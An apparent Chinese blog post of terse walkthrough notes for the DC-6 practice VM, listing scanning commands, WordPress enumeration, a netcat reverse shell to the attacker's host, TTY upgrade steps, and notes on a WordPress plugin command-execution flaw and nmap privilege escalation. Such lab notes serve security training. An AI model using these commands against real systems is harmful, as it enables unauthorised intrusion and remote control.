靶机DC-6的通关笔记 

fping -aqg 192.168.1.1/24

nmap -sC -A -n -p- -Pn -T5 -oN DC-6 192.168.1.141

 

 

 

wpscan --url http://wordy/ -e -u

nc 192.168.1.131 1337 -e /bin/bash

https://gtfobins.github.io/

 

 

 

最后总结:

  1.重定向的网站通过修改hosts文件解决

  2.WordPress 后台中activity moniter中存在命令执行漏洞

  3.优化终端的操作

      Python -c 'import pty;pty.spawn("/bin/bash")'
      Ctrl+z
      stty raw -echo
      fg
      回车
      回车
      回车

  4.nmap可以利用脚本提权

  5.牛逼的网站 https://gtfobins.github.io/

  6.我真菜

 

posted @ 2020-04-23 11:49  木讷叶  阅读(395)  评论(0)    收藏  举报